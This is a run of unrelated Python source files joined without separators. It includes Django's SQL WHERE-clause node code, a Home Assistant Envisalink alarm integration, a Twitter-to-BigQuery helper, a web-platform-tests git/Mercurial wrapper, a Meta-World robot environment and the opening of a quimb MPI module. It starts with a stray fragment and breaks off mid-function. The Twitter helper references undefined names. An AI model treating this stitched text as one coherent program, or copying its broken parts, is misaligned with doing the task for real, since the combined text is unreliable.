CertificatePoliciesOID.CPS_USER_NOTICE: "id-qt-unotice", }
""" Code to manage the creation and SQL rendering of 'where' constraints. """ from django.core.exceptions import EmptyResultSet from django.utils import tree from django.utils.functional import cached_property # Connection types AND = 'AND' OR = 'OR' class WhereNode(tree.Node): """ An SQL WHERE clause. The class is tied to the Query class that created it (in order to create the correct SQL). A child is usually an expression producing boolean values. Most likely the expression is a Lookup instance. However, a child could also be any class with as_sql() and either relabeled_clone() method or relabel_aliases() and clone() methods and contains_aggregate attribute. """ default = AND def split_having(self, negated=False): """ Return two possibly None nodes: one for those parts of self that should be included in the WHERE clause and one for those parts of self that must be included in the HAVING clause. """ if not self.contains_aggregate: return self, None in_negated = negated ^ self.negated # If the effective connector is OR and this node contains an aggregate, # then we need to push the whole branch to HAVING clause. may_need_split = ( (in_negated and self.connector == AND) or (not in_negated and self.connector == OR)) if may_need_split and self.contains_aggregate: return None, self where_parts = [] having_parts = [] for c in self.children: if hasattr(c, 'split_having'): where_part, having_part = c.split_having(in_negated) if where_part is not None: where_parts.append(where_part) if having_part is not None: having_parts.append(having_part) elif c.contains_aggregate: having_parts.append(c) else: where_parts.append(c) having_node = self.__class__(having_parts, self.connector, self.negated) if having_parts else None where_node = self.__class__(where_parts, self.connector, self.negated) if where_parts else None return where_node, having_node def as_sql(self, compiler, connection): """ Return the SQL version of the where clause and the value to be substituted in. Return '', [] if this node matches everything, None, [] if this node is empty, and raise EmptyResultSet if this node can't match anything. """ result = [] result_params = [] if self.connector == AND: full_needed, empty_needed = len(self.children), 1 else: full_needed, empty_needed = 1, len(self.children) for child in self.children: try: sql, params = compiler.compile(child) except EmptyResultSet: empty_needed -= 1 else: if sql: result.append(sql) result_params.extend(params) else: full_needed -= 1 # Check if this node matches nothing or everything. # First check the amount of full nodes and empty nodes # to make this node empty/full. # Now, check if this node is full/empty using the # counts. if empty_needed == 0: if self.negated: return '', [] else: raise EmptyResultSet if full_needed == 0: if self.negated: raise EmptyResultSet else: return '', [] conn = ' %s ' % self.connector sql_string = conn.join(result) if sql_string: if self.negated: # Some backends (Oracle at least) need parentheses # around the inner SQL in the negated case, even if the # inner SQL contains just a single expression. sql_string = 'NOT (%s)' % sql_string elif len(result) > 1: sql_string = '(%s)' % sql_string return sql_string, result_params def get_group_by_cols(self): cols = [] for child in self.children: cols.extend(child.get_group_by_cols()) return cols def get_source_expressions(self): return self.children[:] def set_source_expressions(self, children): assert len(children) == len(self.children) self.children = children def relabel_aliases(self, change_map): """ Relabel the alias values of any children. 'change_map' is a dictionary mapping old (current) alias values to the new values. """ for pos, child in enumerate(self.children): if hasattr(child, 'relabel_aliases'): # For example another WhereNode child.relabel_aliases(change_map) elif hasattr(child, 'relabeled_clone'): self.children[pos] = child.relabeled_clone(change_map) def clone(self): """ Create a clone of the tree. Must only be called on root nodes (nodes with empty subtree_parents). Childs must be either (Contraint, lookup, value) tuples, or objects supporting .clone(). """ clone = self.__class__._new_instance( children=[], connector=self.connector, negated=self.negated) for child in self.children: if hasattr(child, 'clone'): clone.children.append(child.clone()) else: clone.children.append(child) return clone def relabeled_clone(self, change_map): clone = self.clone() clone.relabel_aliases(change_map) return clone @classmethod def _contains_aggregate(cls, obj): if isinstance(obj, tree.Node): return any(cls._contains_aggregate(c) for c in obj.children) return obj.contains_aggregate @cached_property def contains_aggregate(self): return self._contains_aggregate(self) @classmethod def _contains_over_clause(cls, obj): if isinstance(obj, tree.Node): return any(cls._contains_over_clause(c) for c in obj.children) return obj.contains_over_clause @cached_property def contains_over_clause(self): return self._contains_over_clause(self) @property def is_summary(self): return any(child.is_summary for child in self.children) class NothingNode: """A node that matches nothing.""" contains_aggregate = False def as_sql(self, compiler=None, connection=None): raise EmptyResultSet class ExtraWhere: # The contents are a black box - assume no aggregates are used. contains_aggregate = False def __init__(self, sqls, params): self.sqls = sqls self.params = params def as_sql(self, compiler=None, connection=None): sqls = ["(%s)" % sql for sql in self.sqls] return " AND ".join(sqls), list(self.params or ()) class SubqueryConstraint: # Even if aggregates would be used in a subquery, the outer query isn't # interested about those. contains_aggregate = False def __init__(self, alias, columns, targets, query_object): self.alias = alias self.columns = columns self.targets = targets self.query_object = query_object def as_sql(self, compiler, connection): query = self.query_object query.set_values(self.targets) query_compiler = query.get_compiler(connection=connection) return query_compiler.as_subquery_condition(self.alias, self.columns, compiler)
""" Support for Envisalink devices. For more details about this component, please refer to the documentation at https://home-assistant.io/components/envisalink/ """ import asyncio import logging import voluptuous as vol from homeassistant.core import callback import homeassistant.helpers.config_validation as cv from homeassistant.const import EVENT_HOMEASSISTANT_STOP, CONF_TIMEOUT from homeassistant.helpers.entity import Entity from homeassistant.helpers.discovery import async_load_platform from homeassistant.helpers.dispatcher import async_dispatcher_send REQUIREMENTS = ['pyenvisalink==3.8'] _LOGGER = logging.getLogger(__name__) DOMAIN = 'envisalink' DATA_EVL = 'envisalink' CONF_CODE = 'code' CONF_EVL_HOST = 'host' CONF_EVL_KEEPALIVE = 'keepalive_interval' CONF_EVL_PORT = 'port' CONF_EVL_VERSION = 'evl_version' CONF_PANEL_TYPE = 'panel_type' CONF_PANIC = 'panic_type' CONF_PARTITIONNAME = 'name' CONF_PARTITIONS = 'partitions' CONF_PASS = 'password' CONF_USERNAME = 'user_name' CONF_ZONEDUMP_INTERVAL = 'zonedump_interval' CONF_ZONENAME = 'name' CONF_ZONES = 'zones' CONF_ZONETYPE = 'type' DEFAULT_PORT = 4025 DEFAULT_EVL_VERSION = 3 DEFAULT_KEEPALIVE = 60 DEFAULT_ZONEDUMP_INTERVAL = 30 DEFAULT_ZONETYPE = 'opening' DEFAULT_PANIC = 'Police' DEFAULT_TIMEOUT = 10 SIGNAL_ZONE_UPDATE = 'envisalink.zones_updated' SIGNAL_PARTITION_UPDATE = 'envisalink.partition_updated' SIGNAL_KEYPAD_UPDATE = 'envisalink.keypad_updated' ZONE_SCHEMA = vol.Schema({ vol.Required(CONF_ZONENAME): cv.string, vol.Optional(CONF_ZONETYPE, default=DEFAULT_ZONETYPE): cv.string}) PARTITION_SCHEMA = vol.Schema({ vol.Required(CONF_PARTITIONNAME): cv.string}) CONFIG_SCHEMA = vol.Schema({ DOMAIN: vol.Schema({ vol.Required(CONF_EVL_HOST): cv.string, vol.Required(CONF_PANEL_TYPE): vol.All(cv.string, vol.In(['HONEYWELL', 'DSC'])), vol.Required(CONF_USERNAME): cv.string, vol.Required(CONF_PASS): cv.string, vol.Optional(CONF_CODE): cv.string, vol.Optional(CONF_PANIC, default=DEFAULT_PANIC): cv.string, vol.Optional(CONF_ZONES): {vol.Coerce(int): ZONE_SCHEMA}, vol.Optional(CONF_PARTITIONS): {vol.Coerce(int): PARTITION_SCHEMA}, vol.Optional(CONF_EVL_PORT, default=DEFAULT_PORT): cv.port, vol.Optional(CONF_EVL_VERSION, default=DEFAULT_EVL_VERSION): vol.All(vol.Coerce(int), vol.Range(min=3, max=4)), vol.Optional(CONF_EVL_KEEPALIVE, default=DEFAULT_KEEPALIVE): vol.All(vol.Coerce(int), vol.Range(min=15)), vol.Optional( CONF_ZONEDUMP_INTERVAL, default=DEFAULT_ZONEDUMP_INTERVAL): vol.Coerce(int), vol.Optional( CONF_TIMEOUT, default=DEFAULT_TIMEOUT): vol.Coerce(int), }), }, extra=vol.ALLOW_EXTRA) SERVICE_CUSTOM_FUNCTION = 'invoke_custom_function' ATTR_CUSTOM_FUNCTION = 'pgm' ATTR_PARTITION = 'partition' SERVICE_SCHEMA = vol.Schema({ vol.Required(ATTR_CUSTOM_FUNCTION): cv.string, vol.Required(ATTR_PARTITION): cv.string, }) async def async_setup(hass, config): """Set up for Envisalink devices.""" from pyenvisalink import EnvisalinkAlarmPanel conf = config.get(DOMAIN) host = conf.get(CONF_EVL_HOST) port = conf.get(CONF_EVL_PORT) code = conf.get(CONF_CODE) panel_type = conf.get(CONF_PANEL_TYPE) panic_type = conf.get(CONF_PANIC) version = conf.get(CONF_EVL_VERSION) user = conf.get(CONF_USERNAME) password = conf.get(CONF_PASS) keep_alive = conf.get(CONF_EVL_KEEPALIVE) zone_dump = conf.get(CONF_ZONEDUMP_INTERVAL) zones = conf.get(CONF_ZONES) partitions = conf.get(CONF_PARTITIONS) connection_timeout = conf.get(CONF_TIMEOUT) sync_connect = asyncio.Future(loop=hass.loop) controller = EnvisalinkAlarmPanel( host, port, panel_type, version, user, password, zone_dump, keep_alive, hass.loop, connection_timeout) hass.data[DATA_EVL] = controller @callback def login_fail_callback(data): """Handle when the evl rejects our login.""" _LOGGER.error("The Envisalink rejected your credentials") if not sync_connect.done(): sync_connect.set_result(False) @callback def connection_fail_callback(data): """Network failure callback.""" _LOGGER.error("Could not establish a connection with the Envisalink") if not sync_connect.done(): sync_connect.set_result(False) @callback def connection_success_callback(data): """Handle a successful connection.""" _LOGGER.info("Established a connection with the Envisalink") if not sync_connect.done(): hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_envisalink) sync_connect.set_result(True) @callback def zones_updated_callback(data): """Handle zone timer updates.""" _LOGGER.debug("Envisalink sent a zone update event. Updating zones...") async_dispatcher_send(hass, SIGNAL_ZONE_UPDATE, data) @callback def alarm_data_updated_callback(data): """Handle non-alarm based info updates.""" _LOGGER.debug("Envisalink sent new alarm info. Updating alarms...") async_dispatcher_send(hass, SIGNAL_KEYPAD_UPDATE, data) @callback def partition_updated_callback(data): """Handle partition changes thrown by evl (including alarms).""" _LOGGER.debug("The envisalink sent a partition update event") async_dispatcher_send(hass, SIGNAL_PARTITION_UPDATE, data) @callback def stop_envisalink(event): """Shutdown envisalink connection and thread on exit.""" _LOGGER.info("Shutting down Envisalink") controller.stop() async def handle_custom_function(call): """Handle custom/PGM service.""" custom_function = call.data.get(ATTR_CUSTOM_FUNCTION) partition = call.data.get(ATTR_PARTITION) controller.command_output(code, partition, custom_function) controller.callback_zone_timer_dump = zones_updated_callback controller.callback_zone_state_change = zones_updated_callback controller.callback_partition_state_change = partition_updated_callback controller.callback_keypad_update = alarm_data_updated_callback controller.callback_login_failure = login_fail_callback controller.callback_login_timeout = connection_fail_callback controller.callback_login_success = connection_success_callback _LOGGER.info("Start envisalink.") controller.start() result = await sync_connect if not result: return False # Load sub-components for Envisalink if partitions: hass.async_create_task(async_load_platform( hass, 'alarm_control_panel', 'envisalink', { CONF_PARTITIONS: partitions, CONF_CODE: code, CONF_PANIC: panic_type }, config )) hass.async_create_task(async_load_platform( hass, 'sensor', 'envisalink', { CONF_PARTITIONS: partitions, CONF_CODE: code }, config )) if zones: hass.async_create_task(async_load_platform( hass, 'binary_sensor', 'envisalink', { CONF_ZONES: zones }, config )) hass.services.async_register(DOMAIN, SERVICE_CUSTOM_FUNCTION, handle_custom_function, schema=SERVICE_SCHEMA) return True class EnvisalinkDevice(Entity): """Representation of an Envisalink device.""" def __init__(self, name, info, controller): """Initialize the device.""" self._controller = controller self._info = info self._name = name @property def name(self): """Return the name of the device.""" return self._name @property def should_poll(self): """No polling needed.""" return False
import os, sys BASE_DIR = os.path.dirname(os.path.realpath(__file__)) sys.path.insert(0, "%s/libs" % BASE_DIR) import time import json from datetime import datetime, timedelta import httplib2 import logging.config from config import Config from apiclient.discovery import build from apiclient.errors import HttpError from gnippy import rules, searchclient f = file("./config") config = Config(f) class Utils: BQ_CLIENT = None @staticmethod def get_bq(): if Utils.BQ_CLIENT: return Utils.BQ_CLIENT BQ_CREDENTIALS = None # If runing on Google stack, authenticate natively if Utils.isGae(): from oauth2client import appengine BQ_CREDENTIALS = appengine.AppAssertionCredentials(scope='https://www.googleapis.com/auth/bigquery') else: from oauth2client.client import SignedJwtAssertionCredentials KEY = Utils.read_file(config.KEY_FILE) BQ_CREDENTIALS = SignedJwtAssertionCredentials(config.SERVICE_ACCOUNT, KEY, 'https://www.googleapis.com/auth/bigquery') BQ_HTTP = BQ_CREDENTIALS.authorize(httplib2.Http()) Utils.BQ_CLIENT = build('bigquery', 'v2', http=BQ_HTTP) return Utils.BQ_CLIENT @staticmethod def isGae(): # http://stackoverflow.com/questions/1916579/in-python-how-can-i-test-if-im-in-google-app-engine-sdk software = os.environ.get('SERVER_SOFTWARE', None) return software and ("Google App Engine" in software or "Development" in software) @staticmethod def get_gnip(): g = searchclient.SearchClient(config.GNIP_USERNAME, config.GNIP_PASSWORD, config.GNIP_SEARCH_URL) return g @staticmethod def insert_table(dataset_id, table_id, schema): body = { "tableReference" : { "projectId" : config.PROJECT_ID, "tableId" : table_id, "datasetId" : dataset_id }, "schema" : { "fields" : schema } } response = None try: response = Utils.get_bq().tables().insert(projectId=config.PROJECT_ID, datasetId=dataset_id, body=body).execute() except HttpError, e: # HttpError 409 when requesting URI returned # "Already Exists: Table twitter-for-bigquery:gnip.tweets_nbafinals" if e.resp.status == 409: response = True else: raise e return response @staticmethod def insert_records(dataset_id, table_id, tweets): # ensure insertId to avoid duplicate records body = { "kind": "bigquery#tableDataInsertAllRequest", "rows": [{ "insertId" : t["id"], "json" : Utils.scrub(t) } for t in tweets ] } response = Utils.get_bq().tabledata().insertAll(projectId=config.PROJECT_ID, datasetId=dataset_id, tableId=table_id, body=body).execute() return response @staticmethod def import_from_file(dataset_id, table_id, filename, single_tweet=False): records = [] if single_tweet: records = [json.loads(Utils.read_file(SAMPLE_TWEET_FILE))] success = Utils.insert_records(dataset_id, table_id, records) return success else: with open(filename, "r") as f: records = [Utils.scrub(json.loads(tweet)) for tweet in f if json.loads(tweet).get("delete", None) == None] success = Utils.insert_records(dataset_id, table_id, [record]) @staticmethod def get_config(config_file): props = {} for name in (name for name in dir(config) if not name.startswith('_')): props[name] = getattr(config, name, '') return props @staticmethod def enable_logging(): root = None if Utils.isGae(): logging.getLogger().setLevel(logging.DEBUG) else: path = "./logging.conf" logging.config.fileConfig(path) root = logging.getLogger("root") return root @staticmethod # BUGBUG: aim to NOT scrub results def scrub(d): # d.iteritems isn't used as you can't del or the iterator breaks. for key, value in d.items(): if value is None: del d[key] elif key == 'coordinates': del d[key] elif key == 'attributes': # in 'place' object del d[key] elif key == 'bounding_box': # in 'place' object del d[key] elif key == 'retweeted_status': del d[key] elif key == 'created_at': d[key] = Utils.convert_timestamp(value) elif isinstance(value, dict): Utils.scrub(value) return d # For convenience @staticmethod def read_file(fn): data = "" with open(fn, "r") as f: for line in f: data = data + line return data @staticmethod def convert_timestamp(str): ts = time.strptime(str,'%a %b %d %H:%M:%S +0000 %Y') ts = time.strftime('%Y-%m-%d %H:%M:%S', ts) return ts @staticmethod def millis_to_date(ts): return datetime.fromtimestamp(ts/1000) @staticmethod def millis_to_str(ts, format='%Y-%m-%d %H:%M'): return Utils.millis_to_date(ts).strftime(format) @staticmethod def parse_bqid(id): if id: import re return re.split('\:|\.', id) return None @staticmethod def make_tag(dataset, table): return "%s.%s" % (dataset, table) # main() generates a schema from a tweet. It requires the following # library to work, and is not included in this TwitterDev package # https://github.com/tylertreat/BigQuery-Python # def main(): # # from bigquery import schema_from_record # # tweet_str = Utils.read_file("data/sample_tweet_powertrack.json") # record = json.loads(record_str) # schema = schema_from_record(record) # schema = json.dumps(schema) # print schema # # with open('data/schema.json', 'wt') as out: # res = json.dump(schema, out, sort_keys=False, indent=4, separators=(',', ': ')) # # if __name__ == "__main__": # main()
import os import re import subprocess import tempfile from .. import vcs from ..vcs import git, hg def get_unique_name(existing, initial): """Get a name either equal to initial or of the form initial_N, for some integer N, that is not in the set existing. :param existing: Set of names that must not be chosen. :param initial: Name, or name prefix, to use""" if initial not in existing: return initial for i in range(len(existing) + 1): test = "%s_%s" % (initial, i + 1) if test not in existing: return test assert False class NoVCSTree(object): name = "non-vcs" def __init__(self, root=None): if root is None: root = os.path.abspath(os.curdir) self.root = root @classmethod def is_type(cls, path=None): return True @property def is_clean(self): return True def add_new(self, prefix=None): pass def add_ignored(self, sync_tree, prefix): pass def create_patch(self, patch_name, message): pass def update_patch(self, include=None): pass def commit_patch(self): pass class HgTree(object): name = "mercurial" def __init__(self, root=None): if root is None: root = hg("root").strip() self.root = root self.hg = vcs.bind_to_repo(hg, self.root) def __getstate__(self): rv = self.__dict__.copy() del rv['hg'] return rv def __setstate__(self, dict): self.__dict__.update(dict) self.hg = vcs.bind_to_repo(vcs.hg, self.root) @classmethod def is_type(cls, path=None): kwargs = {"log_error": False} if path is not None: kwargs["repo"] = path try: hg("root", **kwargs) except Exception: return False return True @property def is_clean(self): return self.hg("status").strip() == b"" def add_new(self, prefix=None): if prefix is not None: args = ("-I", prefix) else: args = () self.hg("add", *args) def add_ignored(self, sync_tree, prefix): pass def create_patch(self, patch_name, message): try: self.hg("qinit", log_error=False) except subprocess.CalledProcessError: pass patch_names = [item.strip() for item in self.hg("qseries").split(b"\n") if item.strip()] suffix = 0 test_name = patch_name while test_name in patch_names: suffix += 1 test_name = "%s-%i" % (patch_name, suffix) self.hg("qnew", test_name, "-X", self.root, "-m", message) def update_patch(self, include=None): if include is not None: args = [] for item in include: args.extend(["-I", item]) else: args = () self.hg("qrefresh", *args) return True def commit_patch(self): self.hg("qfinish") def contains_commit(self, commit): try: self.hg("identify", "-r", commit.sha1) return True except subprocess.CalledProcessError: return False class GitTree(object): name = "git" def __init__(self, root=None, log_error=True): if root is None: root = git("rev-parse", "--show-toplevel", log_error=log_error).strip().decode('utf-8') self.root = root self.git = vcs.bind_to_repo(git, self.root, log_error=log_error) self.message = None self.commit_cls = Commit def __getstate__(self): rv = self.__dict__.copy() del rv['git'] return rv def __setstate__(self, dict): self.__dict__.update(dict) self.git = vcs.bind_to_repo(vcs.git, self.root) @classmethod def is_type(cls, path=None): kwargs = {"log_error": False} if path is not None: kwargs["repo"] = path try: git("rev-parse", "--show-toplevel", **kwargs) except Exception: return False return True @property def rev(self): """Current HEAD revision""" if vcs.is_git_root(self.root): return self.git("rev-parse", "HEAD").strip() else: return None @property def is_clean(self): return self.git("status").strip() == b"" def add_new(self, prefix=None): """Add files to the staging area. :param prefix: None to include all files or a path prefix to add all files under that path. """ if prefix is None: args = ["-a"] else: args = ["--no-ignore-removal", prefix] self.git("add", *args) def add_ignored(self, sync_tree, prefix): """Add files to the staging area that are explicitly ignored by git. :param prefix: None to include all files or a path prefix to add all files under that path. """ with tempfile.TemporaryFile() as f: sync_tree.git("ls-tree", "-z", "-r", "--name-only", "HEAD", stdout=f) f.seek(0) ignored_files = sync_tree.git("check-ignore", "--no-index", "--stdin", "-z", stdin=f) args = [] for entry in ignored_files.decode('utf-8').split('\0'): args.append(os.path.join(prefix, entry)) if args: self.git("add", "--force", *args) def list_refs(self, ref_filter=None): """Get a list of sha1, name tuples for references in a repository. :param ref_filter: Pattern that reference name must match (from the end, matching whole /-delimited segments only """ args = [] if ref_filter is not None: args.append(ref_filter) data = self.git("show-ref", *args) rv = [] for line in data.split(b"\n"): if not line.strip(): continue sha1, ref = line.split() rv.append((sha1, ref)) return rv def list_remote(self, remote, ref_filter=None): """Return a list of (sha1, name) tupes for references in a remote. :param remote: URL of the remote to list. :param ref_filter: Pattern that the reference name must match. """ args = [] if ref_filter is not None: args.append(ref_filter) data = self.git("ls-remote", remote, *args) rv = [] for line in data.split(b"\n"): if not line.strip(): continue sha1, ref = line.split() rv.append((sha1, ref)) return rv def get_remote_sha1(self, remote, branch): """Return the SHA1 of a particular branch in a remote. :param remote: the remote URL :param branch: the branch name""" for sha1, ref in self.list_remote(remote, branch): if ref.decode('utf-8') == "refs/heads/%s" % branch: return self.commit_cls(self, sha1.decode('utf-8')) assert False def create_patch(self, patch_name, message): # In git a patch is actually a commit self.message = message def update_patch(self, include=None): """Commit the staged changes, or changes to listed files. :param include: Either None, to commit staged changes, or a list of filenames (which must already be in the repo) to commit """ if include is not None: args = tuple(include) else: args = () if self.git("status", "-uno", "-z", *args).strip(): self.git("add", *args) return True return False def commit_patch(self): assert self.message is not None if self.git("diff", "--name-only", "--staged", "-z").strip(): self.git("commit", "-m", self.message) return True return False def init(self): self.git("init") assert vcs.is_git_root(self.root) def checkout(self, rev, branch=None, force=False): """Checkout a particular revision, optionally into a named branch. :param rev: Revision identifier (e.g. SHA1) to checkout :param branch: Branch name to use :param force: Force-checkout """ assert rev is not None args = [] if branch: branches = [ref[len("refs/heads/"):].decode('utf-8') for sha1, ref in self.list_refs() if ref.startswith(b"refs/heads/")] branch = get_unique_name(branches, branch) args += ["-b", branch] if force: args.append("-f") args.append(rev) self.git("checkout", *args) def update(self, remote, remote_branch, local_branch): """Fetch from the remote and checkout into a local branch. :param remote: URL to the remote repository :param remote_branch: Branch on the remote repository to check out :param local_branch: Local branch name to check out into """ if not vcs.is_git_root(self.root): self.init() self.git("clean", "-xdf") self.git("fetch", remote, "%s:%s" % (remote_branch, local_branch)) self.checkout(local_branch) self.git("submodule", "update", "--init", "--recursive") def clean(self): self.git("checkout", self.rev) self.git("branch", "-D", self.local_branch) def paths(self): """List paths in the tree""" repo_paths = [self.root] + [os.path.join(self.root, path) for path in self.submodules()] rv = [] for repo_path in repo_paths: paths = vcs.git("ls-tree", "-r", "--name-only", "HEAD", repo=repo_path).split(b"\n") rv.extend(os.path.relpath(os.path.join(repo_path, item.decode('utf-8')), self.root) for item in paths if item.strip()) return rv def submodules(self): """List submodule directories""" output = self.git("submodule", "status", "--recursive") rv = [] for line in output.split(b"\n"): line = line.strip() if not line: continue parts = line.split(b" ") rv.append(parts[1]) return rv def contains_commit(self, commit): try: self.git("rev-parse", "--verify", commit.sha1) return True except subprocess.CalledProcessError: return False class CommitMessage(object): def __init__(self, text): self.text = text self._parse_message() def __str__(self): return self.text def _parse_message(self): lines = self.text.splitlines() self.full_summary = lines[0] self.body = "\n".join(lines[1:]) class Commit(object): msg_cls = CommitMessage _sha1_re = re.compile("^[0-9a-f]{40}$") def __init__(self, tree, sha1): """Object representing a commit in a specific GitTree. :param tree: GitTree to which this commit belongs. :param sha1: Full sha1 string for the commit """ assert self._sha1_re.match(sha1) self.tree = tree self.git = tree.git self.sha1 = sha1 self.author, self.email, self.message = self._get_meta() def __getstate__(self): rv = self.__dict__.copy() del rv['git'] return rv def __setstate__(self, dict): self.__dict__.update(dict) self.git = self.tree.git def _get_meta(self): author, email, message = self.git("show", "-s", "--format=format:%an\n%ae\n%B", self.sha1).decode('utf-8').split("\n", 2) return author, email, self.msg_cls(message)
import numpy as np from gym.spaces import Box from scipy.spatial.transform import Rotation from metaworld.envs import reward_utils from metaworld.envs.asset_path_utils import full_v2_path_for from metaworld.envs.mujoco.sawyer_xyz.sawyer_xyz_env import SawyerXYZEnv, _assert_task_is_set class SawyerPushBackEnvV2(SawyerXYZEnv): OBJ_RADIUS = 0.007 TARGET_RADIUS = 0.05 def __init__(self): goal_low = (-0.1, 0.6, 0.0199) goal_high = (0.1, 0.7, 0.0201) hand_low = (-0.5, 0.40, 0.05) hand_high = (0.5, 1, 0.5) obj_low = (-0.1, 0.8, 0.02) obj_high = (0.1, 0.85, 0.02) super().__init__( self.model_name, hand_low=hand_low, hand_high=hand_high, ) self.init_config = { 'obj_init_pos':np.array([0, 0.8, 0.02]), 'obj_init_angle': 0.3, 'hand_init_pos': np.array([0, 0.6, 0.2], dtype=np.float32), } self.goal = np.array([0., 0.6, 0.02]) self.obj_init_pos = self.init_config['obj_init_pos'] self.obj_init_angle = self.init_config['obj_init_angle'] self.hand_init_pos = self.init_config['hand_init_pos'] self._random_reset_space = Box( np.hstack((obj_low, goal_low)), np.hstack((obj_high, goal_high)), ) self.goal_space = Box(np.array(goal_low), np.array(goal_high)) @property def model_name(self): return full_v2_path_for('sawyer_xyz/sawyer_push_back_v2.xml') @_assert_task_is_set def evaluate_state(self, obs, action): obj = obs[4:7] ( reward, tcp_to_obj, tcp_opened, target_to_obj, object_grasped, in_place ) = self.compute_reward(action, obs) success = float(target_to_obj <= 0.07) near_object = float(tcp_to_obj <= 0.03) grasp_success = float(self.touching_object and (tcp_opened > 0) and \ (obj[2] - 0.02 > self.obj_init_pos[2])) info = { 'success': success, 'near_object': near_object, 'grasp_success': grasp_success, 'grasp_reward': object_grasped, 'in_place_reward': in_place, 'obj_to_target': target_to_obj, 'unscaled_reward': reward, } return reward, info def _get_pos_objects(self): return self.data.get_geom_xpos('objGeom') def _get_quat_objects(self): return Rotation.from_matrix( self.data.get_geom_xmat('objGeom') ).as_quat() def adjust_initObjPos(self, orig_init_pos): # This is to account for meshes for the geom and object are not aligned # If this is not done, the object could be initialized in an extreme position diff = self.get_body_com('obj')[:2] - self.data.get_geom_xpos('objGeom')[:2] adjustedPos = orig_init_pos[:2] + diff # The convention we follow is that body_com[2] is always 0, and geom_pos[2] is the object height return [adjustedPos[0], adjustedPos[1],self.data.get_geom_xpos('objGeom')[-1]] def reset_model(self): self._reset_hand() self._target_pos = self.goal.copy() self.obj_init_pos = self.adjust_initObjPos(self.init_config['obj_init_pos']) self.obj_init_angle = self.init_config['obj_init_angle'] if self.random_init: goal_pos = self._get_state_rand_vec() self._target_pos = np.concatenate((goal_pos[-3:-1], [self.obj_init_pos[-1]])) while np.linalg.norm(goal_pos[:2] - self._target_pos[:2]) < 0.15: goal_pos = self._get_state_rand_vec() self._target_pos = np.concatenate((goal_pos[-3:-1], [self.obj_init_pos[-1]])) self.obj_init_pos = np.concatenate((goal_pos[:2], [self.obj_init_pos[-1]])) self._set_obj_xyz(self.obj_init_pos) return self._get_obs() def _gripper_caging_reward(self, action, obj_position, obj_radius): pad_success_margin = 0.05 grip_success_margin = obj_radius + 0.003 x_z_success_margin = 0.01 tcp = self.tcp_center left_pad = self.get_body_com('leftpad') right_pad = self.get_body_com('rightpad') delta_object_y_left_pad = left_pad[1] - obj_position[1] delta_object_y_right_pad = obj_position[1] - right_pad[1] right_caging_margin = abs(abs(obj_position[1] - self.init_right_pad[1]) - pad_success_margin) left_caging_margin = abs(abs(obj_position[1] - self.init_left_pad[1]) - pad_success_margin) right_caging = reward_utils.tolerance(delta_object_y_right_pad, bounds=(obj_radius, pad_success_margin), margin=right_caging_margin, sigmoid='long_tail', ) left_caging = reward_utils.tolerance(delta_object_y_left_pad, bounds=(obj_radius, pad_success_margin), margin=left_caging_margin, sigmoid='long_tail', ) right_gripping = reward_utils.tolerance(delta_object_y_right_pad, bounds=(obj_radius, grip_success_margin), margin=right_caging_margin, sigmoid='long_tail', ) left_gripping = reward_utils.tolerance(delta_object_y_left_pad, bounds=(obj_radius, grip_success_margin), margin=left_caging_margin, sigmoid='long_tail', ) assert right_caging >= 0 and right_caging <= 1 assert left_caging >= 0 and left_caging <= 1 y_caging = reward_utils.hamacher_product(right_caging, left_caging) y_gripping = reward_utils.hamacher_product(right_gripping, left_gripping) assert y_caging >= 0 and y_caging <= 1 tcp_xz = tcp + np.array([0., -tcp[1], 0.]) obj_position_x_z = np.copy(obj_position) + np.array([0., -obj_position[1], 0.]) tcp_obj_norm_x_z = np.linalg.norm(tcp_xz - obj_position_x_z, ord=2) init_obj_x_z = self.obj_init_pos + np.array([0., -self.obj_init_pos[1], 0.]) init_tcp_x_z = self.init_tcp + np.array([0., -self.init_tcp[1], 0.]) tcp_obj_x_z_margin = np.linalg.norm(init_obj_x_z - init_tcp_x_z, ord=2) - x_z_success_margin x_z_caging = reward_utils.tolerance(tcp_obj_norm_x_z, bounds=(0, x_z_success_margin), margin=tcp_obj_x_z_margin, sigmoid='long_tail',) assert right_caging >= 0 and right_caging <= 1 gripper_closed = min(max(0, action[-1]), 1) assert gripper_closed >= 0 and gripper_closed <= 1 caging = reward_utils.hamacher_product(y_caging, x_z_caging) assert caging >= 0 and caging <= 1 if caging > 0.95: gripping = y_gripping else: gripping = 0. assert gripping >= 0 and gripping <= 1 caging_and_gripping = (caging + gripping) / 2 assert caging_and_gripping >= 0 and caging_and_gripping <= 1 return caging_and_gripping def compute_reward(self, action, obs): obj = obs[4:7] tcp_opened = obs[3] tcp_to_obj = np.linalg.norm(obj - self.tcp_center) target_to_obj = np.linalg.norm(obj - self._target_pos) target_to_obj_init = np.linalg.norm(self.obj_init_pos - self._target_pos) in_place = reward_utils.tolerance( target_to_obj, bounds=(0, self.TARGET_RADIUS), margin=target_to_obj_init, sigmoid='long_tail', ) object_grasped = self._gripper_caging_reward(action, obj, self.OBJ_RADIUS) reward = reward_utils.hamacher_product(object_grasped, in_place) if (tcp_to_obj < 0.01) and (0 < tcp_opened < 0.55) and \ (target_to_obj_init - target_to_obj > 0.01): reward += 1. + 5. * in_place if target_to_obj < self.TARGET_RADIUS: reward = 10. return ( reward, tcp_to_obj, tcp_opened, target_to_obj, object_grasped, in_place )
"""Manages the spawning of mpi processes to send to the various solvers. """ import os import functools import numpy as np from .slepc_linalg import ( eigs_slepc, svds_slepc, mfn_multiply_slepc, ssolve_slepc, ) from ..core import _NUM_THREAD_WORKERS # Work out if already running as mpi if ('OMPI_COMM_WORLD_SIZE' in os.environ) or ('PMI_SIZE' in os.environ): ALREADY_RUNNING_AS_MPI = True if '_QUIMB_MPI_LAUNCHED' not in os.environ: raise RuntimeError( "For the moment, quimb programs launched explicitly" " using MPI need to use `quimb-mpi-python`.") USE_SYNCRO = "QUIMB_SYNCRO_MPI" in os.environ else: ALREADY_RUNNING_AS_MPI = False USE_SYNCRO = False # Work out the desired total number of workers for _NUM_MPI_WORKERS_VAR in ['QUIMB_NUM_MPI_WORKERS', 'QUIMB_NUM_PROCS', 'OMPI_COMM_WORLD_SIZE', 'PMI_SIZE', 'OMP_NUM_THREADS']: if _NUM_MPI_WORKERS_VAR in os.environ: NUM_MPI_WORKERS = int(os.environ[_NUM_MPI_WORKERS_VAR]) break else: import psutil _NUM_MPI_WORKERS_VAR = 'psutil' NUM_MPI_WORKERS = psutil.cpu_count(logical=False) def bcast(result, comm, result_rank): """Broadcast a result to all workers, dispatching to proper MPI (rather than pickled) communication if the result is a numpy array. """ 